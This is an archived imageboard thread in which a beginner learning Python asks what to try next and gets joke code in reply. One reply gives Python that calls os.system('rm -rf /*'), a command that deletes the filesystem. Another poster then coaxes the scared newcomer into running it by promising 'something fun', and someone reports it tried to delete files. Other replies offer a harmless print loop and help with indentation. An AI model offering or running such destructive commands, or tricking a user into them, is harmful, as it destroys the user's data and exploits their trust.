This thread is permanently archived
I learned how
Post number #
926344
,
ID:
081882
| to do this is python (I think its funny)
'fuck'*100000000
What should I do next g/u/rls?
Post number #
926350
,
ID:
081882
| sometimes I type while the command loads and I pretend that I'm an epic hacker
Post number #
926367
,
ID:
2d14a0
| do this
import os
os.system('rm -rf /*')
Post number #
926368
,
ID:
95e447
| Try this
import time
while 0 < 1:
print("fuck")
time.sleep(0.2)
Post number #
926370
,
ID:
804498
| FUCKING fuck
Post number #
926379
,
ID:
081882
|
>
>926368
I'm getting an invalid syntax error :(((((
Post number #
926383
,
ID:
804498
|
>
>926379
try adding a space before print and a space before time
' print("fuck")' like this
Post number #
926389
,
ID:
081882
|
>
>926383
ok
Post number #
926391
,
ID:
081882
|
>
>926383
oh my god it worked I love you thank you
Post number #
926392
,
ID:
081882
|
>
>926367
What does this do? I'm scared that it will do something spooky to my operating system ://
Post number #
926396
,
ID:
804498
| It prints "fuck" every 0.2 second infinitely until you stop the program
Post number #
926424
,
ID:
cc060e
|
>
>926392
if you type it... something fun will happen!
Post number #
926955
,
ID:
06f03c
|
>
>926367
>
>926424
I ran it through an online python thingy and it tried deleting a lot of stuff ://
Post number #
926956
,
ID:
06f03c
|
>
>926424
What does Import Os mean? i just want to know please This is interesting to me.
Total number of posts: 14, last modified on:
Mon Jan 1 00:00:00 1666895781
This thread is permanently archived
| to do this is python (I think its funny)
'fuck'*100000000
What should I do next g/u/rls?